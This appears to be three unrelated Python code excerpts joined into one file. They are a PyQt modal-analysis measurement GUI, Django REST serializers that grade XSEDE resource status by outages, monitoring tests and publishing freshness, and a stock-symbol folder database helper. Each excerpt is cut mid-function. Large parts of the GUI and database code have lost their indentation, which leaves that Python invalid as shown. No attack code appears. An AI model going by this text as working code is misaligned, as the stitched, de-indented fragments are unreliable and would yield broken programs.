                self.average_counter.setText('')
            elif self.settings['excitation_type'] == 'random' or self.settings['excitation_type'] == 'oma':
                # Prepare for random measurement.
                self.dock_area.moveDock(self.dock_estimators, 'above', self.dock_measurement)
                self.excitation_type_old = self.settings['excitation_type']
                self.average_counter.setText('Pass 0 of {0}'.format(self.settings['n_averages']))
                # self.clock.show()
            else:
                raise ValueError('Wrong excitation type.')
        # -- Set axes labels and units.
        self.fig_h_mag.setXLink(self.fig_h_phi)
        self.fig_exc_zoom.setLabel('left', units_glossary[units_exc_idx][0], units=units_glossary[units_exc_idx][1])
        self.fig_exc_zoom.setLabel('bottom', 'Time - Zoom', units='s')
        self.fig_exc_frq.setLabel('left', units_glossary[units_exc_idx][2], units=units_glossary[units_exc_idx][3])
        self.fig_exc_frq.setLabel('bottom', 'Frequency', units='Hz')
        self.fig_h_mag.setLabel('bottom', 'Frequency', units='Hz')
        self.fig_h_mag.setLabel('left', units_glossary[units_resp_idx][2], units=units_glossary[units_resp_idx][3])
        self.fig_h_phi.setLabel('bottom', 'Frequency', units='Hz')
        self.fig_h_phi.setLabel('left', 'Phase', units='rad')
        # TODO: What about coherence?
        # self.fig_h_mag.showAxis('right')
        # Restore the roving-mode selector from the settings.
        if 'Ref. node' in self.settings['roving_type']:
            self.button_roving.setCurrentIndex(0)
        else:
            self.button_roving.setCurrentIndex(1)
def refresh(self, *args, **kwargs):
self.reload(*args, **kwargs)
def remove_selected(self):
"""Remove selected rows."""
# First, get measurement IDs (unique for that table) for the selected rows.
# measurement_ids = [self.modaldata.tables['measurement_index'].iloc[model.row()].measurement_id
# for model in self.table_view.selectedIndexes()]
current_index = self.button_model.currentIndex()
model_id = self.modaldata.tables['info'].model_id.values[current_index]
active_data = self.modaldata.tables['measurement_index'][self.modaldata.tables['measurement_index'].model_id == model_id]
measurement_ids = [active_data.iloc[model.row()].measurement_id
for model in self.table_view.selectedIndexes()]
# Then remove from measurement_index and measurement_values at that same measurement_id.
self.modaldata.tables['measurement_index'] = self.modaldata.tables['measurement_index'][~self.modaldata.tables['measurement_index'].measurement_id.isin(measurement_ids)]
self.modaldata.tables['measurement_values'] = self.modaldata.tables['measurement_values'][~self.modaldata.tables['measurement_values'].measurement_id.isin(measurement_ids)]
self.modaldata.tables['measurement_values_td'] = self.modaldata.tables['measurement_values_td'][~self.modaldata.tables['measurement_values_td'].measurement_id.isin(measurement_ids)]
self.reload()
self.button_model.setCurrentIndex(current_index)
def setup_measurement_thread(self):
"""Prepare for measurement."""
# self.process = mt.Impact()
if dp is None:
class Empty(object):
def stop_process(self):
pass
self.process = Empty()
return False
self.process = dp.MeasurementProcess()
self.process.start_process()
def stop_measurement_button_routine():
# self.process.run_flag.value = False
self.process.stop_measurement()
self.timer.stop()
# self.button_save_raw.setEnabled(True)
self.stop_routine = stop_measurement_button_routine
def start_measurement(self):
"""Start measuring."""
self.button_accept_measurement.setDisabled(True)
self.button_repeat_measurement.setDisabled(True)
self.button_doublehit.setStyleSheet('color: lightgray')
self.button_overload.setStyleSheet('color: lightgray')
# -- Initialize plots.
self.fig_exc.clear()
self.fig_resp.clear()
self.fig_exc_zoom.clear()
self.fig_exc_frq.clear()
self.fig_h_mag.clear()
self.fig_h_phi.clear()
if hasattr(self, 'view_legend_mag'):
self.view_legend_mag.scene().removeItem(self.view_legend_mag)
self.view_legend_mag = self.fig_h_mag.addLegend()
exc_curve = self.fig_exc.plot(pen=pg.mkPen({'color':'#bdc3c7'}))
self.fig_exc.enableAutoRange('x', True)
self.fig_exc.enableAutoRange('y', True)
if self.settings['excitation_type'] == 'oma':
self.fig_h_mag_pen = [self.fig_h_mag.plot(pen=pg.mkPen({'color': self.colors[i]})) for i in range(len(self.settings['resp_channels'])+1)]
self.fig_h_phi_pen = [self.fig_h_phi.plot(pen=pg.mkPen({'color': self.colors[i]})) for i in range(len(self.settings['resp_channels'])+1)]
else:
self.fig_h_mag_pen = [self.fig_h_mag.plot(pen=pg.mkPen({'color': self.colors[i]})) for i in range(len(self.settings['resp_channels']))]
self.fig_h_phi_pen = [self.fig_h_phi.plot(pen=pg.mkPen({'color': self.colors[i]})) for i in range(len(self.settings['resp_channels']))]
self.fig_exc_zoom_pen = self.fig_exc_zoom.plot()
self.fig_exc_frq_pen = self.fig_exc_frq.plot()
self.legend.scene().removeItem(self.legend)
self.legend = self.fig_resp.addLegend()
# TODO: Before running the measurement check if everything is set. Make a funkction check_run and put it in __init__.
nr_ch = len(self.settings['resp_channels'])
resp_curves = [self.fig_resp.plot(
pen=pg.mkPen({'color': self.colors[i]}),
name='Ch {0} - {1}'.format(i, self.settings['channel_names'][self.settings['resp_channels'][i]]))
for i in range(nr_ch)]
# resp_curve = self.fig_resp.plot(pen='y')
self.fig_resp.enableAutoRange('x', True)
self.fig_resp.enableAutoRange('y', True)
self.n_averages_done = 0
# TODO: This must be made into an object. Too much mess using it this way.
# Plot update function - impulse measurement.
def plot_impulse(triggered, exc_curve, resp_curve, pipe,
exc_channel, resp_channels):
# mstimehere = time.time()
plotdata = pipe.recv()
# mstime, plotdata = pipe.recv()
resp = plotdata[resp_channels, :]
exc = plotdata[exc_channel, :]
exc_curve.setData(self.x_axis, exc)
# if double_hit_check(exc, self.x_axis[1]-self.x_axis[0]):
# self.button_doublehit.setStyleSheet('color: red')
# else:
# self.button_overload.setStyleSheet('color: lightgray')
if overload_check(exc):
self.button_overload.setStyleSheet('color: red')
else:
self.button_overload.setStyleSheet('color: lightgray')
# TODO: This should be faster.
overload_list = []
for i in range(resp.shape[0]):
overload_list.append(overload_check(resp[i, :]))
resp_curve[i].setData(self.x_axis, resp[i, :])
if True in overload_list:
self.button_overload.setStyleSheet('color: red')
else:
self.button_overload.setStyleSheet('color: lightgray')
if triggered.value:
# Stop measurement.
triggered.value = False
self.button_run.toggle()
# Sometimes measurement gives zeros. We have to retry the measurement.
if exc.sum() == 0.0:
self.button_run.toggle()
else:
# Show detailed data for impact type of measurement.
self.add_measurement_data(exc, resp)
        def plot_random(triggered, exc_curve, resp_curve, pipe,
                        exc_channel, resp_channels, random_chunk):
            """Timer callback for random excitation: redraw curves and, on trigger,
            average in the next completed chunk.

            Same parameters as plot_impulse, plus:
            random_chunk -- connection delivering one completed averaging chunk
                            (channel x sample) when triggered fires
            """
            # mstimehere = time.time()
            # Blocks until the acquisition process sends the next data block.
            plotdata = pipe.recv()
            # mstime, plotdata = pipe.recv()
            resp = plotdata[resp_channels, :]
            exc = plotdata[exc_channel, :]
            exc_curve.setData(self.x_axis, exc)
            # Excitation overload indicator.
            if overload_check(exc):
                self.button_overload.setStyleSheet('color: red')
            else:
                self.button_overload.setStyleSheet('color: lightgray')
            # TODO: This should be faster.
            # print('Now drawing')
            # Redraw every response curve and collect per-channel overload flags.
            overload_list = []
            for i in range(resp.shape[0]):
                overload_list.append(overload_check(resp[i, :]))
                resp_curve[i].setData(self.x_axis, resp[i, :])
            # NOTE(review): overwrites the excitation indicator set above.
            if True in overload_list:
                self.button_overload.setStyleSheet('color: red')
            else:
                self.button_overload.setStyleSheet('color: lightgray')
            if triggered.value:
                # print('Now Triggered')
                triggered.value = False
                # Fetch the finished chunk and fold it into the running averages.
                chunk_data = random_chunk.recv()
                resp = chunk_data[resp_channels, :]
                exc = chunk_data[exc_channel, :]
                self.add_measurement_data(exc, resp)
                self.average_counter.setText('Pass {0} of {1}'.format(self.n_averages_done, self.settings['n_averages']))
                # Stop automatically once the requested number of averages is reached.
                if self.n_averages_done >= self.settings['n_averages']:
                    # TODO: Problems when stopping mid-measurement or for short windows!
                    # print(random_chunk.recv())
                    self.button_run.toggle()
        def plot_oma(triggered, exc_curve, resp_curve, pipe,
                     exc_channel, resp_channels, random_chunk):
            """Timer callback for operational modal analysis (OMA) measurements.

            Same parameters as plot_random.  Differs from plot_random only in
            that the triggered chunk keeps ALL channels (chunk_data[:, :]) as
            the response set, not just resp_channels.
            """
            # mstimehere = time.time()
            # Blocks until the acquisition process sends the next data block.
            plotdata = pipe.recv()
            # mstime, plotdata = pipe.recv()
            resp = plotdata[resp_channels, :]
            exc = plotdata[exc_channel, :]
            # Excitation overload indicator.
            if overload_check(exc):
                self.button_overload.setStyleSheet('color: red')
            else:
                self.button_overload.setStyleSheet('color: lightgray')
            exc_curve.setData(self.x_axis, exc)
            # TODO: This should be faster.
            # print('Now drawing')
            # Redraw every response curve and collect per-channel overload flags.
            overload_list = []
            for i in range(resp.shape[0]):
                overload_list.append(overload_check(resp[i, :]))
                resp_curve[i].setData(self.x_axis, resp[i, :])
            # NOTE(review): overwrites the excitation indicator set above.
            if True in overload_list:
                self.button_overload.setStyleSheet('color: red')
            else:
                self.button_overload.setStyleSheet('color: lightgray')
            if triggered.value:
                # print('Now Triggered')
                triggered.value = False
                # Fetch the finished chunk; for OMA every channel is treated as a response.
                chunk_data = random_chunk.recv()
                resp = chunk_data[:, :]
                exc = chunk_data[exc_channel, :]
                self.add_measurement_data(exc, resp)
                self.average_counter.setText('Pass {0} of {1}'.format(self.n_averages_done, self.settings['n_averages']))
                # Stop automatically once the requested number of averages is reached.
                if self.n_averages_done >= self.settings['n_averages']:
                    # TODO: Problems when stopping mid-measurement or for short windows!
                    # print(random_chunk.recv())
                    self.button_run.toggle()
# Send over the settings, could be different, could be the same.
self.process.setup_measurement_parameters(self.settings)
for key in self.settings:
self.process.__dict__[key] = self.settings[key]
self.process.run_measurement()
sampling_fr = self.process.task_info_out.recv()
self.x_axis = np.arange(0, self.settings['samples_per_channel']/sampling_fr, 1/sampling_fr)
self.sampling_fr = sampling_fr
# Set up and start timed refresh. It must be a child of self (self.timer, not timer) otherwise it is
# unreferenced instantly.
self.timer = QtCore.QTimer()
print(self.settings['channel_delay'])
if self.settings['excitation_type'] == 'impulse':
# -- Initialize frf objects. For each channel.
self.frf_container = [frf.FRF(self.sampling_fr,
exc_type=self.settings['channel_types'][self.settings['exc_channel']],
resp_type=self.settings['channel_types'][self.settings['resp_channels'][i]],
exc_window=self.settings['exc_window'], resp_window=self.settings['resp_window'],
resp_delay=self.settings['channel_delay'][self.settings['resp_channels'][i]],
fft_len=self.settings['samples_per_channel']+self.settings['zero_padding'],
archive_time_data=self.settings['save_time_history']) for
i in range(len(self.settings['resp_channels']))]
# aa = [(self.settings['channel_types'][self.settings['resp_channels'][i]],
# self.settings['channel_delay'][self.settings['resp_channels'][i]])
# for i in range(len(self.settings['resp_channels']))]
# print(aa)
self.timer.timeout.connect(lambda triggered=self.process.triggered, exc_curve=exc_curve, resp_curve=resp_curves,
pipe=self.process.process_measured_data_out,
exc_channel=self.settings['exc_channel'],
resp_channels=self.settings['resp_channels']:
plot_impulse(triggered, exc_curve, resp_curve, pipe, exc_channel, resp_channels))
self.timer.start(100)
elif self.settings['excitation_type'] == 'random':
self.frf_container = [frf.FRF(self.sampling_fr,
exc_type=self.settings['channel_types'][self.settings['exc_channel']],
resp_type=self.settings['channel_types'][self.settings['resp_channels'][i]],
exc_window=self.settings['exc_window'], resp_window=self.settings['resp_window'],
resp_delay=self.settings['channel_delay'][self.settings['resp_channels'][i]],
weighting=self.settings['weighting'], n_averages=self.settings['n_averages'],
fft_len=self.settings['samples_per_channel']+self.settings['zero_padding'],
archive_time_data=self.settings['save_time_history']) for
i in range(len(self.settings['resp_channels']))]
self.timer.timeout.connect(lambda triggered=self.process.triggered, exc_curve=exc_curve, resp_curve=resp_curves,
pipe=self.process.process_measured_data_out,
exc_channel=self.settings['exc_channel'],
resp_channels=self.settings['resp_channels'],
random_chunk=self.process.process_random_chunk_out:
plot_random(triggered, exc_curve, resp_curve, pipe, exc_channel, resp_channels,
random_chunk))
self.timer.start(1000)
elif self.settings['excitation_type'] == 'oma':
self.frf_container = [frf.FRF(self.sampling_fr,
exc_type=self.settings['channel_types'][self.settings['exc_channel']],
resp_type=self.settings['channel_types'][i],
exc_window=self.settings['exc_window'], resp_window=self.settings['resp_window'],
resp_delay=self.settings['channel_delay'][i],
weighting=self.settings['weighting'], n_averages=self.settings['n_averages'],
fft_len=self.settings['samples_per_channel']+self.settings['zero_padding'],
archive_time_data=self.settings['save_time_history']) for
i in range(len(self.settings['resp_channels'])+1)]
self.timer.timeout.connect(lambda triggered=self.process.triggered, exc_curve=exc_curve, resp_curve=resp_curves,
pipe=self.process.process_measured_data_out,
exc_channel=self.settings['exc_channel'],
resp_channels=self.settings['resp_channels'],
random_chunk=self.process.process_random_chunk_out:
plot_oma(triggered, exc_curve, resp_curve, pipe, exc_channel, resp_channels,
random_chunk))
self.timer.start(1000)
def add_measurement_data(self, excitation, response):
"""Show | |
<reponame>XSEDE/XSEDE_Information_Warehouse
from django.urls import reverse, get_script_prefix
from django.utils.encoding import uri_to_iri
from django.utils import timezone
from rest_framework import serializers
from rest_framework.relations import PrimaryKeyRelatedField
from glue2_db.models import ComputingManager, ComputingManagerAcceleratorInfo, ComputingShare
from rdr_db.models import RDRResource
from monitoring_db.models import TestResult
from outages.models import Outages
from processing_status.models import ProcessingRecord
import datetime
class Resource_Status_Serializer(serializers.Serializer):
    """Serialize an RDRResource into a traffic-light status summary.

    Each *_Status field returns a dict with a 'Label' (Green/Yellow/Red),
    a human readable 'Summary', and reference URLs; Overall_Status rolls
    the individual facets up into a single label.

    NOTE(review): the get_* methods stash their Label/Summary on self so
    that get_Overall_Status (declared last, hence rendered last) can
    combine them — field declaration order is load-bearing.  Because one
    serializer instance is reused for every object when many=True, each
    getter must fully reset the state it owns.
    """
    # Resource identifiers and descriptions
    ResourceID = serializers.CharField(source='info_resourceid')
    SiteID = serializers.CharField(source='info_siteid')
    DisplayName = serializers.CharField(source='resource_descriptive_name')
    ProjectAffiliation = serializers.CharField(source='project_affiliation')
    ProviderLevel = serializers.CharField(source='provider_level')
    # Per-facet scratch state shared between the get_* methods below.
    RDR_Label = ''
    RDR_Summary = ''
    RDR_Declared_Status = serializers.SerializerMethodField()
    Outage_Label = ''
    Outage_Summary = ''
    Outage_Status = serializers.SerializerMethodField()
    Monitor_Label = ''
    Monitor_Summary = ''
    Monitoring_Status = serializers.SerializerMethodField()
    Overall_Status = serializers.SerializerMethodField()

    def get_RDR_Declared_Status(self, RDRResource):
        """Map the RDR declared status onto Green/Yellow/Red plus a summary."""
        if RDRResource.latest_status in ['production']:
            self.RDR_Label = 'Green'
        elif RDRResource.latest_status in ['post-production', 'pre-production', 'friendly']:
            self.RDR_Label = 'Yellow'
        else:
            self.RDR_Label = 'Red'
        self.RDR_Summary = 'In "{}"'.format(RDRResource.latest_status)
        if RDRResource.latest_status_begin:
            self.RDR_Summary += ' starting {}'.format(RDRResource.latest_status_begin)
        if RDRResource.latest_status_end:
            self.RDR_Summary += ' until {}'.format(RDRResource.latest_status_end)
        http_request = self.context.get("request")
        if http_request:
            RDR_URL = http_request.build_absolute_uri(uri_to_iri(reverse('rdr-detail-rdrid', args=[RDRResource.rdr_resource_id])))
        else:
            RDR_URL = ''
        return {'Label': self.RDR_Label,
                'Declared_Status': RDRResource.latest_status,
                'Declared_Status_Begin': RDRResource.latest_status_begin,
                'Declared_Status_End': RDRResource.latest_status_end,
                'Summary': self.RDR_Summary,
                'References_URLs': RDR_URL}

    def get_Outage_Status(self, RDRResource):
        """Label current outages: Red for a full outage, Yellow for partial."""
        now = timezone.now()
        outsearch = Outages.objects.filter(ResourceID=RDRResource.info_resourceid, OutageStart__lte=now, OutageEnd__gte=now)
        outurls = set()
        Full_Outage = False
        http_request = self.context.get("request")
        for out in outsearch:
            if http_request:
                outurls.add(http_request.build_absolute_uri(uri_to_iri(reverse('outages-detail', args=[out.OutageID]))))
            if out.OutageType.upper() == 'FULL':
                Full_Outage = True
        if Full_Outage:
            self.Outage_Label = 'Red'
            self.Outage_Summary = 'Full outage reported'
        elif outsearch:
            self.Outage_Label = 'Yellow'
            # Bug fix: typo 'repoted' -> 'reported'
            self.Outage_Summary = 'Partial outage reported (%s)' % len(outsearch)
        else:
            self.Outage_Label = 'Green'
            self.Outage_Summary = ''
        return {'Label': self.Outage_Label,
                'Summary': self.Outage_Summary,
                'References_URLs': outurls}

    def get_Monitoring_Status(self, RDRResource):
        """Label monitoring tests: Red all failing, Yellow some, Green none."""
        monsearch = TestResult.objects.filter(ResourceID=RDRResource.info_resourceid)
        monfail = set()
        monurls = set()
        http_request = self.context.get("request")
        for mon in monsearch:
            if mon.Result.upper() in ['PASS', 'SUCCESS']:
                continue
            monfail.add(mon.ID)
            if http_request:
                monurls.add(http_request.build_absolute_uri(uri_to_iri(reverse('testresult-detail', args=[mon.ID]))))
        if not monfail:
            self.Monitor_Label = 'Green'
            # Bug fix: reset so a summary from a previously serialized object
            # cannot leak through when the instance is reused (many=True).
            self.Monitor_Summary = ''
        elif len(monfail) < len(monsearch):
            self.Monitor_Label = 'Yellow'
            self.Monitor_Summary = '%s of %s tests failing' % (len(monfail), len(monsearch))
        else:
            self.Monitor_Label = 'Red'
            self.Monitor_Summary = 'All %s tests failing' % len(monfail)
        return {'Label': self.Monitor_Label,
                'Summary': self.Monitor_Summary,
                'Reference_URLs': monurls}

    def get_Overall_Status(self, RDRResource):
        """Roll the RDR/Outage/Monitoring facets up into one label."""
        # Overall Status algorithm
        # Red: RDR declared status is not Green(production) or Yellow(pre-production, post-production, friendly)
        #     or Red(FULL) outage declared
        #     or Red(ALL) tests are failing
        # Yellow: Yellow(PARTIAL) outage declared
        #     or Yellow(SOME) tests are failing
        # Green: Green everything
        #     allowing RDR declared Yellow(pre-production, post-production, friendly)
        Summary_Items = []
        Summary_Severity = 0  # 0 = Green, 1 = Yellow, 2 = Red
        if self.RDR_Label not in ['Green', 'Yellow']:
            Summary_Items.append(self.RDR_Summary)
            Summary_Severity = max(2, Summary_Severity)
        if self.Outage_Label == 'Red':
            Summary_Items.append(self.Outage_Summary)
            Summary_Severity = max(2, Summary_Severity)
        if self.Monitor_Label == 'Red':
            Summary_Items.append(self.Monitor_Summary)
            Summary_Severity = max(2, Summary_Severity)
        if Summary_Severity == 0:
            # RDR_Label in ['Green', 'Yellow'] and Outage_Label != 'Red' and Monitor_Label != 'Red'
            if self.Outage_Label == 'Yellow':
                Summary_Items.append(self.Outage_Summary)
                Summary_Severity = max(1, Summary_Severity)
            if self.Monitor_Label == 'Yellow':
                Summary_Items.append(self.Monitor_Summary)
                Summary_Severity = max(1, Summary_Severity)
        if Summary_Severity == 0:
            Summary_Items.append('System operating normally')
        return {'Label': ['Green', 'Yellow', 'Red'][Summary_Severity],
                'Summary': '; '.join(Summary_Items),
                'Status_at': timezone.now()}

    class Meta:
        model = RDRResource
        fields = ('rdr_resource_id', 'rdr_type', 'info_resourceid', 'info_siteid',
                  'resource_descriptive_name', 'resource_status', 'current_statuses',
                  'latest_status', 'latest_status_begin', 'latest_status_end',
                  'project_affiliation', 'provider_level')
class Resource_Ops_Status_Serializer(serializers.Serializer):
    """Operations-oriented variant of Resource_Status_Serializer that also
    checks information publishing freshness.

    # Proposed REQUIRED/OPTIONAL rules and publishing Warning/Error states
    # Software (modules) and service publishing using IPF is REQUIRED by all L1, L2, and L3 SPs.
    # Queue information publishing using IPF IS REQUIRED by allocated L1 & L2 compute resources, OPTIONAL for everyone else.
    # Job state changes are OPTIONAL by everyone.
    # Software (module) and service publishing should be published at least DAILY.
    # We would display a WARNING if they haven't published in over one day, and an ERROR if they haven't published in 3 days.
    # Queue information should be published at least HOURLY.
    # We would display a WARNING if they haven't published in over one hour, and an ERROR if they haven't published in 3 hours.

    NOTE(review): the get_* methods stash their Label/Summary on self so that
    get_Overall_Status (declared last, hence rendered last) can combine them —
    field declaration order is load-bearing.  Because one serializer instance
    is reused for every object when many=True, each getter must fully reset
    the state it owns.
    """
    # Resource identifiers and descriptions
    ResourceID = serializers.CharField(source='info_resourceid')
    SiteID = serializers.CharField(source='info_siteid')
    DisplayName = serializers.CharField(source='resource_descriptive_name')
    ProjectAffiliation = serializers.CharField(source='project_affiliation')
    ProviderLevel = serializers.CharField(source='provider_level')
    # Per-facet scratch state shared between the get_* methods below.
    RDR_Label = ''
    RDR_Summary = ''
    RDR_Declared_Status = serializers.SerializerMethodField()
    Outage_Label = ''
    Outage_Summary = ''
    Outage_Status = serializers.SerializerMethodField()
    Monitor_Label = ''
    Monitor_Summary = ''
    Monitoring_Status = serializers.SerializerMethodField()
    Publishing_Label = ''
    Publishing_Summary = ''
    Publishing_Status = serializers.SerializerMethodField()
    Overall_Status = serializers.SerializerMethodField()

    def get_RDR_Declared_Status(self, RDRResource):
        """Map the RDR declared status onto Green/Yellow/Red plus a summary."""
        if RDRResource.latest_status in ['production']:
            self.RDR_Label = 'Green'
        elif RDRResource.latest_status in ['post-production', 'pre-production', 'friendly']:
            self.RDR_Label = 'Yellow'
        else:
            self.RDR_Label = 'Red'
        self.RDR_Summary = 'In "{}"'.format(RDRResource.latest_status)
        if RDRResource.latest_status_begin:
            self.RDR_Summary += ' starting {}'.format(RDRResource.latest_status_begin)
        if RDRResource.latest_status_end:
            self.RDR_Summary += ' until {}'.format(RDRResource.latest_status_end)
        http_request = self.context.get("request")
        if http_request:
            RDR_URL = http_request.build_absolute_uri(uri_to_iri(reverse('rdr-detail-rdrid', args=[RDRResource.rdr_resource_id])))
        else:
            RDR_URL = ''
        return {'Label': self.RDR_Label,
                'Declared_Status': RDRResource.latest_status,
                'Declared_Status_Begin': RDRResource.latest_status_begin,
                'Declared_Status_End': RDRResource.latest_status_end,
                'Summary': self.RDR_Summary,
                'References_URLs': RDR_URL}

    def get_Outage_Status(self, RDRResource):
        """Label current outages: Red for a full outage, Yellow for partial."""
        now = timezone.now()
        outsearch = Outages.objects.filter(ResourceID=RDRResource.info_resourceid, OutageStart__lte=now, OutageEnd__gte=now)
        outurls = set()
        Full_Outage = False
        http_request = self.context.get("request")
        for out in outsearch:
            if http_request:
                outurls.add(http_request.build_absolute_uri(uri_to_iri(reverse('outages-detail', args=[out.OutageID]))))
            if out.OutageType.upper() == 'FULL':
                Full_Outage = True
        if Full_Outage:
            self.Outage_Label = 'Red'
            self.Outage_Summary = 'Full outage reported'
        elif outsearch:
            self.Outage_Label = 'Yellow'
            # Bug fix: typo 'repoted' -> 'reported'
            self.Outage_Summary = 'Partial outage reported (%s)' % len(outsearch)
        else:
            self.Outage_Label = 'Green'
            self.Outage_Summary = ''
        return {'Label': self.Outage_Label,
                'Summary': self.Outage_Summary,
                'References_URLs': outurls}

    def get_Monitoring_Status(self, RDRResource):
        """Label monitoring tests: Red all failing, Yellow some, Green none."""
        monsearch = TestResult.objects.filter(ResourceID=RDRResource.info_resourceid)
        monfail = set()
        monurls = set()
        http_request = self.context.get("request")
        for mon in monsearch:
            if mon.Result.upper() in ['PASS', 'SUCCESS']:
                continue
            monfail.add(mon.ID)
            if http_request:
                monurls.add(http_request.build_absolute_uri(uri_to_iri(reverse('testresult-detail', args=[mon.ID]))))
        if not monfail:
            self.Monitor_Label = 'Green'
            # Bug fix: the original assigned a dead local ('Monitor_Summary = ...'),
            # leaving a stale self.Monitor_Summary from a previous object.
            self.Monitor_Summary = ''
        elif len(monfail) < len(monsearch):
            self.Monitor_Label = 'Yellow'
            self.Monitor_Summary = '%s of %s tests failing' % (len(monfail), len(monsearch))
        else:
            self.Monitor_Label = 'Red'
            self.Monitor_Summary = 'All %s tests failing' % len(monfail)
        return {'Label': self.Monitor_Label,
                'Summary': self.Monitor_Summary,
                'Reference_URLs': monurls}

    def get_Publishing_Status(self, RDRResource):
        """Label IPF publishing freshness per the WARNING/ERROR rules above.

        Blue means nothing has been published at all for this resource.
        """
        pubsearch = ProcessingRecord.objects.filter(About=RDRResource.info_resourceid)
        puberror = set()
        pubwarning = set()
        puburls = set()
        http_request = self.context.get("request")
        for pub in pubsearch:
            add_url = False
            # Age is measured from ProcessingEnd when the run finished,
            # otherwise from ProcessingStart.
            if pub.ProcessingEnd:
                delta = timezone.now() - pub.ProcessingEnd
            else:
                delta = timezone.now() - pub.ProcessingStart
            if pub.Topic == 'glue2.applications':
                # Software/services: daily expected; warn >1 day, error >3 days.
                if delta > datetime.timedelta(days=3):
                    puberror.add(pub)
                    add_url = True
                elif delta > datetime.timedelta(days=1):
                    pubwarning.add(pub)
                    add_url = True
            elif pub.Topic == 'glue2.compute':
                # Queue info: hourly expected; warn >1 hour, error >3 hours.
                if delta > datetime.timedelta(hours=3):
                    puberror.add(pub)
                    add_url = True
                elif delta > datetime.timedelta(hours=1):
                    pubwarning.add(pub)
                    add_url = True
            if pub.ProcessingCode != '0':
                puberror.add(pub)
                add_url = True
            if http_request and add_url:
                puburls.add(http_request.build_absolute_uri(uri_to_iri(reverse('processingrecord-detail', args=[pub.ID]))))
        if not pubsearch:  # Nothing published
            self.Publishing_Label = 'Blue'
            # Bug fix: reset so a summary from a previously serialized object
            # cannot leak through when the instance is reused (many=True).
            self.Publishing_Summary = ''
        elif not puberror and not pubwarning:
            self.Publishing_Label = 'Green'
            self.Publishing_Summary = ''
        elif puberror:
            self.Publishing_Label = 'Red'
            self.Publishing_Summary = 'Some published information is old or missing ({} of {})'.format(len(puberror), len(pubsearch))
        else:
            self.Publishing_Label = 'Yellow'
            # Bug fix: typo 'informaton' -> 'information'
            self.Publishing_Summary = 'Some published information is stale ({} of {})'.format(len(pubwarning), len(pubsearch))
        return {'Label': self.Publishing_Label,
                'Summary': self.Publishing_Summary,
                'Reference_URLs': puburls}

    def get_Overall_Status(self, RDRResource):
        """Roll RDR/Outage/Monitoring/Publishing facets up into one label."""
        # Overall Status algorithm
        # Red: RDR declared status is not Green(production) or Yellow(pre-production, post-production, friendly)
        #     or Red(FULL) outage declared
        #     or Red(ALL) tests are failing
        #     or Red(ANY) published information is old or missing)
        # Yellow: Yellow(PARTIAL) outage declared
        #     or Yellow(SOME) tests are failing
        # Green: Green everything
        #     allowing RDR Yellow(pre-production, post-production, friendly)
        #     allowing Publishing Yellow(stale information)
        Summary_Items = []
        Summary_Severity = 0  # 0 = Green, 1 = Yellow, 2 = Red
        if self.RDR_Label not in ['Green', 'Yellow']:
            Summary_Items.append(self.RDR_Summary)
            Summary_Severity = max(2, Summary_Severity)
        if self.Outage_Label == 'Red':
            Summary_Items.append(self.Outage_Summary)
            Summary_Severity = max(2, Summary_Severity)
        if self.Monitor_Label == 'Red':
            Summary_Items.append(self.Monitor_Summary)
            Summary_Severity = max(2, Summary_Severity)
        if self.Publishing_Label == 'Red':
            Summary_Items.append(self.Publishing_Summary)
            Summary_Severity = max(2, Summary_Severity)
        if Summary_Severity == 0:
            # RDR_Label in ['Green', 'Yellow'] and Outage_Label != 'Red' and Monitor_Label != 'Red' and Publishing_Label != 'Red'
            if self.Outage_Label == 'Yellow':
                Summary_Items.append(self.Outage_Summary)
                Summary_Severity = max(1, Summary_Severity)
            if self.Monitor_Label == 'Yellow':
                Summary_Items.append(self.Monitor_Summary)
                Summary_Severity = max(1, Summary_Severity)
            if self.Publishing_Label == 'Yellow':
                # Inform of Stale publishing without impacting the severity
                Summary_Items.append(self.Publishing_Summary)
                # Summary_Severity = max(1, Summary_Severity)
            elif Summary_Severity == 0:
                # The elif (rather than a plain if) avoids appending the
                # normal-operation message alongside a stale-publishing note.
                Summary_Items.append('System operating normally')
        return {'Label': ['Green', 'Yellow', 'Red'][Summary_Severity],
                'Summary': '; '.join(Summary_Items),
                'Status_at': timezone.now()}

    class Meta:
        model = RDRResource
        fields = ('rdr_resource_id', 'rdr_type', 'info_resourceid', 'info_siteid',
                  'resource_descriptive_name', 'resource_status', 'current_statuses',
                  'latest_status', 'latest_status_begin', 'latest_status_end',
                  'project_affiliation', 'provider_level')
class Resource_Batch_Status_Serializer(serializers.Serializer):
# Resource identifiers and descriptions
ResourceID = serializers.CharField(source='info_resourceid')
SiteID = serializers.CharField(source='info_siteid')
DisplayName = serializers.CharField(source='resource_descriptive_name')
ProjectAffiliation = serializers.CharField(source='project_affiliation')
ProviderLevel = serializers.CharField(source='provider_level')
# %utilization and free CPUs if available particularly and total jobs.
Computing_Manager_Info = serializers.SerializerMethodField()
Computing_Manager_Accelerator_Info = serializers.SerializerMethodField()
Computing_Share_Info = serializers.SerializerMethodField()
# Computing_Share_Accelerator_Info = serializers.SerializerMethodField()
# Computing_Queue_Info = serializers.SerializerMethodField()
def get_Computing_Manager_Info(self, RDRResource):
managers = ComputingManager.objects.filter(ResourceID=RDRResource.info_resourceid)
results = {}
# Should only have one
for man in managers:
results['TotalSlots'] = man.EntityJSON.get('TotalSlots', None)
results['SlotsUsedByLocalJobs'] = man.EntityJSON.get('SlotsUsedByLocalJobs', | |
+ js['status'])
else:
col_list.append(row[i])
else:
col_list.append(row[i])
answer = dict(zip(keys, col_list))
items.append(answer)
table = TableCls(items, html_attrs = {'width':'100%','border-spacing':0})
folder_options = ""
folder_options += '<option value="switch to">switch to</option>'
folder_options += '<option value="delete">delete</option>'
name_options = ""
for name in names:
if (name["pretty name"] != answer["folder name"]):
name_options += '<option value="{0}">{0}</option>'.format(name["pretty name"], name["pretty name"])
if (verbose):
print ("***\n")
return table.__html__(), column_options, name_options, folder_options
#endregion defaults
#region folder
def Add(symbol, verbose):
    """Add *symbol* to the folder table and seed it with company data,
    an initial quote, and a zero share count.

    Returns False only when the database cannot be opened; otherwise True.
    Quote-service errors are collected and printed when verbose.
    """
    db_file = GetDB(verbose)
    if (verbose):
        print ("***")
        print ("Add(1) symbol: {0}".format(symbol))
        print ("Add(2) dbase: {0}".format(db_file))
    # Ensure the row (and the folder table itself) exists before updating it.
    result = CreateFolder(symbol, verbose)
    if (result):
        try:
            conn = sqlite3.connect(db_file)
            if (verbose):
                print("Add(3) sqlite3: {0}".format(sqlite3.version))
        except Error as e:
            print("Add(4) {0}".format(e))
            return False
    # NOTE(review): if CreateFolder returned False, 'conn' is unbound here and
